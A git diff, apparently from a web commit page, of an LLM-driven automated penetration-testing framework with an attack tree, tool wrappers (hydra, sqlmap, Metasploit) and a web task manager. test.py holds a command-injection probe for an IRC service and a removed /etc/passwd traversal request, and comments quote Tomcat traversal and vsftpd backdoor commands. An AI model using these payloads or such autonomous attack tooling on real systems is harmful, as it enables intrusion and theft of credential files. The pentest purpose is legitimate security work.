cur_node,self.DataFilter) # message要更新
if not bsuccess:
self.logger.error(f"模型接口调用出错:{content}")
ierror += 1
if ierror == 3: #重试3
if ierror == 3: #重试3
break
continue# res_str没有调整,重复使用
res_str = ""
@ -811,18 +817,21 @@ class TaskObject:
self.logger.error(f"{cur_node.name}-llm入库失败!")
#把返回的测试指令进行追加
new_commands.extend(commands)
#判断是否还有未添加指令的节点
for node_json in node_cmds: #正常应该只有一条no_instruction --暂时只处理
if "no_instruction" in node_json and "nodes" in node_json:
tmp_nodes = []
node_names = node_json["nodes"].replace('',',').split(',')
for node_name in node_names:
if node_name in nodes:
tmp_nodes.append(node_name)
res_str = ','.join(tmp_nodes)
break
else:#其他节点指令不处理
self.logger.error(f"遇到一次no_instruction补充指令时返回了其他节点指令{node_cmds}")
#再验证是否还有缺少的
tmp_nodes = []
for no_instr_node in no_instr_nodes:
bcommand = False
for com in commands:
if no_instr_node in com:
bcommand = True
break
if bcommand: # 如果存在测试指令,则不把该节点放入补充信息llm任务---尝试不对比是否有返回指令,DS会一直返回指令,还返回on_instruction
continue
# 没有对应指令
tmp_nodes.append(no_instr_node)
res_str = ','.join(tmp_nodes)
no_instr_nodes = tmp_nodes
self.logger.debug("未添加指令的节点,都已完成指令的添加!")
return new_commands
@ -833,11 +842,12 @@ class TaskObject:
if attack_tree: # 有值的情况是load
self.attack_tree = attack_tree
# 加载未完成的任务
if self.work_type == 1: # 自动模式
# 提交到mq,待线程执行
self.put_work_node()
# if self.work_type == 1: # 自动模式
# # 提交到mq,待线程执行
self.put_work_node(self.work_type)
else: # 无值的情况是new_create
root_node = TreeNode(self.target, self.task_id) # 根节点
root_node = TreeNode(self.target, self.task_id,0) # 根节点
self.attack_tree = AttackTree(root_node) # 创建测试树,同时更新根节点相关内容
self.LLM.build_initial_prompt(root_node) # 对根节点初始化system-msg
# 插入一个user消息
@ -938,6 +948,15 @@ class TaskObject:
return b_over
def test(self,task_id):
root_node = TreeNode(self.target, task_id,0) # 根节点
self.attack_tree = AttackTree(root_node) # 创建测试树,同时更新根节点相关内容
self.LLM.build_initial_prompt(root_node) # 对根节点初始化system-msg
# 初始保存个attack_tree文件
g_PKM.WriteData(self.attack_tree, str(task_id))
if __name__ == "__main__":
pass

64
myutils/ContentManager.py

@ -0,0 +1,64 @@
import json
class ContentManager:
def extract_json(self,s: str):
start = s.find('{')
if start < 0:
return None
depth = 0
for i, ch in enumerate(s[start:], start):
if ch == '{':
depth += 1
elif ch == '}':
depth -= 1
if depth == 0:
return s[start:i + 1]
return None # 没有闭合
def auto_complete_json(self,s: str) -> str:
"""
在字符串 s 自动检测未匹配的 { 并在末尾补全相应数量的 }
返回补全后的新字符串
"""
depth = 0
in_string = False
escape = False
for ch in s:
if escape:
escape = False
continue
if ch == '\\':
escape = True
continue
if ch == '"' and not escape:
in_string = not in_string
continue
if not in_string:
if ch == '{':
depth += 1
elif ch == '}':
if depth > 0:
depth -= 1
# depth 此时就是多余的 “{” 数量
if depth > 0:
s = s + '}' * depth
return s
def extract_and_fix_json(self,text: str):
"""
1. 找到首个 '{'然后尝试用 extract_json 的方式截取到末尾
2. 如果 extract_json 返回 None就用 auto_complete_json 补全后再试一次 json.loads
"""
# 找到第一个 {
start = text.find('{')
if start < 0:
raise ValueError("字符串中没有发现 '{'")
fragment = text[start:]
# 先自动补全一次
fixed = self.auto_complete_json(fragment)
# 再尝试解析
try:
return json.loads(fixed)
except json.JSONDecodeError as e:
raise ValueError(f"补全后仍解析失败: {e}")

7
myutils/PickleManager.py

@ -23,9 +23,10 @@ class PickleManager:
def ReadData(self,filename=""):
attack_tree = None
filepath = self.getfile_path(filename)
with self.lock:
with open(filepath, "rb") as f:
attack_tree = pickle.load(f)
if os.path.exists(filepath):
with self.lock:
with open(filepath, "rb") as f:
attack_tree = pickle.load(f)
return attack_tree
def DelData(self,filename=""):

10
pipfile

@ -16,6 +16,10 @@ pip install dirsearch -i https://pypi.tuna.tsinghua.edu.cn/simple/
pip install pexpect -i https://pypi.tuna.tsinghua.edu.cn/simple/
pip install smbprotocol -i https://pypi.tuna.tsinghua.edu.cn/simple/
pip install ipwhois -i https://pypi.tuna.tsinghua.edu.cn/simple
pip install geoip2 -i https://pypi.tuna.tsinghua.edu.cn/simple
pip install python-whois -i https://pypi.tuna.tsinghua.edu.cn/simple
apt install sublist3r
apt install gobuster
@ -55,6 +59,10 @@ pip install pillow -i https://pypi.tuna.tsinghua.edu.cn/simple
#redis--session使用redis缓存--kali
pip install redis aioredis -i https://pypi.tuna.tsinghua.edu.cn/simple
pip install quart-session -i https://pypi.tuna.tsinghua.edu.cn/simple
pip install packaging -i https://pypi.tuna.tsinghua.edu.cn/simple
pip install pycryptodome -i https://pypi.tuna.tsinghua.edu.cn/simple
systemctl start redis-server
systemctl enable redis-server
@ -67,4 +75,6 @@ fc-match Arial #验证安装
----python2------
----网络配置------
nmcli connection modify "zhang_wifi" ipv4.addresses 192.168.3.151/24 ipv4.gateway 192.168.3.1 ipv4.dns "8.8.8.8 114.114.114.114" ipv4.method manual

50
test.py

@ -73,7 +73,7 @@ if __name__ == "__main__":
current_path = os.path.dirname(os.path.realpath(__file__))
print(current_path)
test_type = 1
task_id = 49
task_id = 67
task_Object = TaskObject("test_target","cookie_info",1,1,1,"local_ip","",None)
if test_type == 0:
@ -81,32 +81,32 @@ if __name__ == "__main__":
elif test_type == 1:
# # 获取所有自定义函数详情 HIGH_RISK_FUNCTIONS = ['eval', 'exec', 'os.system', 'subprocess.call', 'subprocess.Popen']
instruction = '''python-code
def dynamic_fun():
import socket
import socket
def dynamic_fun():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(20) # 设置超时时间为20秒
s.connect(("192.168.3.105", 11200))
# 发送畸形RTSP请求探测边界条件
payload = "DESCRIBE rtsp://192.168.3.105/../../../../etc/passwd RTSP/1.0\\\\r\\\\n"
payload += "CSeq: 6\\\\r\\\\n\\\\r\\\\n"
s.settimeout(10)
s.connect(('192.168.3.108', 6667))
payload = 'AB; bash -c "echo vulnerable > /tmp/irc_test"\\r\\n'
s.send(payload.encode())
response = s.recv(4096).decode()
s.close()
if "404" in response:
return (False, "存在输入过滤机制")
elif "root:" in response:
return (True, "成功读取敏感文件")
else:
return (False, f"未知响应:{response}")
check_s = socket.socket()
check_s.settimeout(5)
check_s.connect(('192.168.3.108', 6667))
check_s.send(b'AB; ls /tmp\\r\\n')
response = check_s.recv(1024).decode()
check_s.close()
if 'irc_test' in response:
return (True, "检测到命令注入漏洞")
return (False, "未检测到有效漏洞响应")
except Exception as e:
return (False, f"连接异常:{str(e)}")
return (False, f"检测失败: {str(e)}")
finally:
s.close() if 's' in locals() else None
check_s.close() if 'check_s' in locals() else None
'''
task_Object.PythonM.start_pool() #开个子进程池就行
start_time, end_time, bsuccess, instr, reslut, source_result, ext_params = task_Object.do_instruction(instruction)
@ -115,8 +115,8 @@ def dynamic_fun():
print("----执行结果----")
print(reslut)
elif test_type == 2: #给节点添加指令
node_path = "目标系统->192.168.3.105->52989端口"
instr_id = 3233
node_path = "目标系统->192.168.3.108->80端口->PHP版本漏洞检测"
instr_id = 3478
g_TaskM.load_tasks()
task = g_TaskM.tasks[task_id]
nodes = task.attack_tree.traverse_dfs()
@ -130,7 +130,7 @@ def dynamic_fun():
if "import" in str_instr:
str_instr = "python-code " + str_instr
cur_node.test_add_instr(str_instr)
cur_node.update_work_status(1)
cur_node.update_work_status(-4)
#保存数据
g_PKM.WriteData(task.attack_tree,str(task.task_id))
else:
@ -145,10 +145,10 @@ def dynamic_fun():
for node_name in unique_names:
print(node_name)
elif test_type == 4: # 修改Messages
attact_tree = g_PKM.ReadData("27")
attact_tree = g_PKM.ReadData("60")
# 创建一个新的节点
from mycode.AttackMap import TreeNode
testnode = TreeNode("test", 0)
testnode = TreeNode("test", 0,0)
LLM.build_initial_prompt(testnode) # 新的Message
systems = testnode.parent_messages[0]["content"]
# print(systems)
@ -162,5 +162,7 @@ def dynamic_fun():
mytest.dynamic_fun()
elif test_type == 6:
mytest.tmp_test()
elif test_type == 7:
task_Object.test(50)
else:
pass

2
tools/ArpingTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class ArpingTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

27
tools/CurlTool.py

@ -13,16 +13,19 @@ class CurlTool(ToolBase):
# self.url = None
# self.verify_ssl = True
def get_time_out(self):
def get_time_out(self,instruction=""):
if "&&" in instruction or "||" in instruction:
return 60*15
return 61*2
def validate_instruction(self, instruction_old):
#instruction = instruction_old
#指令过滤
timeout = self.get_time_out() #curl指令遇到不返回的情况 curl --path-as-is -i http://192.168.204.137:8180/webapps/../conf/tomcat-users.xml
timeout = self.get_time_out(instruction_old) #curl指令遇到不返回的情况 curl --path-as-is -i http://192.168.204.137:8180/webapps/../conf/tomcat-users.xml
#添加-i 返回信息头
if 'base64 -d' in instruction_old:
return instruction_old
return instruction_old,timeout
# 分割成单词列表便于处理参数
curl_parts = instruction_old.split()
@ -38,10 +41,10 @@ class CurlTool(ToolBase):
else:
curl_parts.append('-i')
# 判断是否已经有 --max-time 参数
if not any(p.startswith("--max-time") for p in curl_parts):
curl_parts.append("--max-time")
curl_parts.append(str(self.get_time_out())) #添加超时时间
# 判断是否已经有 --max-time 参数 --curl经常组合其他指令使用,不加--max-time参数了,考usbprocess的time_out控制超时
# if not any(p.startswith("--max-time") for p in curl_parts):
# curl_parts.append("--max-time")
# curl_parts.append(str(self.get_time_out())) #添加超时时间
final_instruction = ' '.join(curl_parts)
return final_instruction, timeout
@ -76,6 +79,8 @@ class CurlTool(ToolBase):
def do_worker_subprocess(self,str_instruction,timeout,ext_params):
try:
# 执行命令,捕获输出为字节形式
if not timeout:
timeout = 60*15
if timeout:
result = subprocess.run(str_instruction, shell=True,timeout=timeout, capture_output=True)
else:
@ -298,7 +303,7 @@ class CurlTool(ToolBase):
return result
def analyze_result(self, result,instruction,stderr,stdout):
if len(result) < 2000:
if len(result) < 3000:
return result
if "curl: (28) Operation timed out after" in result or "Dload Upload Total Spent Left Speed" in result:
return "执行超时"
@ -329,12 +334,8 @@ class CurlTool(ToolBase):
result="该漏洞无法利用"
elif("-kv https://" in instruction or "-vk https://" in instruction):
result = self.get_ssl_info(stderr,stdout)
elif("grep " in instruction or " -T " in instruction or "Date:" in instruction):
elif("grep " in instruction or " -T " in instruction or "Date:" in instruction or "dirb" in instruction):
return result
# elif("-X POST " in instruction):
# result = self.get_info_curl(instruction,stdout,stderr)
# elif("-v " in instruction): #curl -v http://192.168.204.137:8180/manager/html --user admin:admin 常规解析curl返回内容
# result = self.get_info_curl(instruction,stdout,stderr)
else:
result = self.get_info_curl(instruction,stdout,stderr)
return result

2
tools/DigTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class DigTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*5
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/DirSearchTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class DirSearchTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
if "-o " not in instruction or "--output=" not in instruction:
instruction += " -o ds_result.txt"
return instruction,timeout

2
tools/DirbTool.py

@ -6,7 +6,7 @@ from tools.ToolBase import ToolBase
class DirbTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
instruction = instruction.strip()
if " -o" not in instruction:
instruction += " -o dirout.txt"

2
tools/Enum4linuxTool.py

@ -4,7 +4,7 @@ from mycode.Result_merge import my_merge
class Enum4linuxTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/Hping3Tool.py

@ -10,7 +10,7 @@ class Hping3Tool(ToolBase):
:param instruction:
:return:
'''
timeout = 0
timeout = 60*15
# 拆分原始指令为列表
cmd_parts = instruction.split()

2
tools/HydraTool.py

@ -6,7 +6,7 @@ from tools.ToolBase import ToolBase
class HydraTool(ToolBase):
def validate_instruction(self, instruction):
timeout = 0
timeout = 60*15
current_path = os.path.dirname(os.path.realpath(__file__))
#hydra过滤 需要判断指令中添加字典文件存不存在
match_p = re.search(r'-P\s+([^\s]+)', instruction)

2
tools/KubehunterTool.py

@ -7,7 +7,7 @@ from tools.ToolBase import ToolBase
class KubehunterTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/MedusaTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class MedusaTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/MkdirTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class MkdirTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/MsfconsoleTool.py

@ -20,7 +20,7 @@ class MsfconsoleTool(ToolBase):
print("Metasploit Exit!")
def validate_instruction(self, instruction):
timeout = 0
timeout = 60*15
modified_code = ""
#针对有分号的指令情况,一般是一行
if ";" in instruction: #举例:msfconsole -q -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST 192.168.204.137; exploit"

2
tools/MsfvenomTool.py

@ -7,7 +7,7 @@ import tempfile
class MsfvenomTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def do_worker_script(self,str_instruction,timeout,ext_params):

2
tools/NslookupTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class NslookupTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/PingTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class PingTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*2
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/PrintfTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class PrintfTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*5
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/RpcclientTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class RpcclientTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/RpcinfoTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class RpcinfoTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/SearchsploitTool.py

@ -11,7 +11,7 @@ class SearchsploitTool(ToolBase):
cur_path = Path(__file__).resolve().parent
payload_dir = cur_path / "../payload"
#指令过滤
timeout = 0
timeout = 60*15
parts = instruction.split("&&")
if len(parts) ==2:
searchsploit_cmd = parts[0].strip()

2
tools/ShowmountTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class ShowmountTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/SmbclientTool.py

@ -4,7 +4,7 @@ import shlex
class SmbclientTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
instruction = instruction.replace("\\", "\\\\")
#instruction = shlex.quote(instruction) #smbclient \\\\192.168.204.137\\tmp -N -c 'put /etc/passwd test_upload; rm test_upload' 针对这样的指令会出错
return instruction,timeout

2
tools/SmbmapTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class SmbmapTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
if " grep " not in instruction:
instruction =instruction.strip() + " | grep -E 'READ|WRITE|Disk|path'"
return instruction,timeout

2
tools/SmtpuserenumTool.py

@ -5,7 +5,7 @@ from tools.ToolBase import ToolBase
class SmtpuserenumTool(ToolBase):
def validate_instruction(self, instruction):
timeout = 0
timeout = 60*15
# 获取当前程序所在目录
current_path = os.path.dirname(os.path.realpath(__file__))
new_user_path = os.path.join(current_path, "../payload", "users")

2
tools/SmugglerTool.py

@ -4,7 +4,7 @@ from tools.ToolBase import ToolBase
class SmugglerTool(ToolBase):
def validate_instruction(self, instruction_old):
timeout = 0
timeout = 60*15
#指令过滤
# 获取当前程序所在目录
current_path = os.path.dirname(os.path.realpath(__file__))

2
tools/SqlmapTool.py

@ -4,7 +4,7 @@ from tools.ToolBase import ToolBase
class SqlmapTool(ToolBase):
def validate_instruction(self, instruction):
timeout = 0
timeout = 60*15
# 检查sqlmap高风险参数
high_risk_params = [
"--os-shell",

2
tools/SshpassTool.py

@ -8,7 +8,7 @@ import tempfile
class SshpassTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def do_worker_script(self,str_instruction,timeout,ext_params):

2
tools/SslscanTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class SslscanTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/Sublist3rTool.py

@ -5,7 +5,7 @@ apt install sublist3r
'''
class Sublist3rTool(ToolBase):
def validate_instruction(self, instruction):
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/SwaksTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class SwaksTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/TouchTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class TouchTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/WgetTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class WgetTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/WhatwebTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class WhatwebTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/WhoisTool.py

@ -4,7 +4,7 @@ from tools.ToolBase import ToolBase
class WhoisTool(ToolBase):
def validate_instruction(self, instruction):
#过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/XvfbrunTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class XvfbrunTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

9
web/API/task.py

@ -24,19 +24,12 @@ async def start_task(): #开始任务
work_type = 0 #data.get("workType") #0-人工,1-自动
if llm_type == 2:
return jsonify({"error": "O3余额不足,请更换模型!"}), 400
# #新增任务处理
# bok,_,_ = g_TM.validate_and_extract(test_target)
# if not bok:
# # 返回错误信息,状态码 400 表示请求错误
# return jsonify({"error": "测试目标验证失败,请检查输入内容!"}), 400
#开始任务
try:
fail_list = g_TaskM.create_task(test_target,llm_type,work_type)
return jsonify({"fail_list":fail_list})
except:
return jsonify({"error": "创建任务异常,前反馈给技术人员!"}), 400
#跳转到任务管理页面
# return redirect(url_for('main.get_html', html='task_manager.html'))
@api.route('/task/taskover',methods=['POST'])
@login_required
@ -137,7 +130,7 @@ async def task_one_step():
'''
data = await request.get_json()
task_id = data.get("cur_task_id")
step_num = data.get("step_num")
step_num = int(data.get("step_num"))
if not task_id:
return jsonify({'error': 'Missing task_id'}), 400
if not step_num:

9
web/main/static/resources/scripts/task_manager.js

@ -294,6 +294,8 @@ async function overTask(){
task_list = []
cur_task = null //当前选择的task--用于修改缓存时使用
cur_task_id = 0 //当前选择的cur_task_id
//清空节点树
taskList.innerHTML = "加载中"; // 清空“加载中”提示
//重新获取任务list
getTasklist();
}else {
@ -366,10 +368,12 @@ document.getElementById("one_step").addEventListener("click",() => {
});
async function one_step_task(){
try {
const stepSElement= document.getElementById("stepNumSelect")
const step_num = stepSElement.value;
const res = await fetch("/api/task/taskstep", {
method: "POST",
headers: { "Content-Type": "application/json" },
body: JSON.stringify({ cur_task_id }), //task_id:task_id
body: JSON.stringify({ cur_task_id,step_num }), //task_id:task_id
});
if (!res.ok) {
const errorData = await res.json();
@ -437,7 +441,7 @@ function renderInstrPage(page) {
const tbody = document.querySelector("#instrTable tbody");
renderTableRows(tbody, pageData);
document.getElementById("instrTable").scrollIntoView({ behavior: "smooth" });
// 更新分页按钮
document.getElementById("instrPrev").dataset.page = page > 1 ? page - 1 : 1;
document.getElementById("instrNext").dataset.page = (end < allInstrs.length) ? page + 1 : page;
@ -532,6 +536,7 @@ function renderVulPage(page) {
const tbody = document.querySelector("#vulTable tbody");
renderTableRows(tbody, pageData);
document.getElementById("vulTable").scrollIntoView({ behavior: "smooth" });
// 更新分页按钮
document.getElementById("vulPrev").dataset.page = page > 1 ? page - 1 : 1;

2
web/main/templates/task_manager.html

@ -214,7 +214,7 @@
<button class="btn btn-primary btn-block m-2" id="actionButton">启动</button>
<div class="m-2" style="margin-bottom: 5px">
<label class="fw-bold" style="font-size:0.9rem">单步步次:</label>
<select class="form-select" id="modelSelect" style="font-size:0.9rem">
<select class="form-select" id="stepNumSelect" style="font-size:0.9rem">
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>

Loading…
Cancel
Save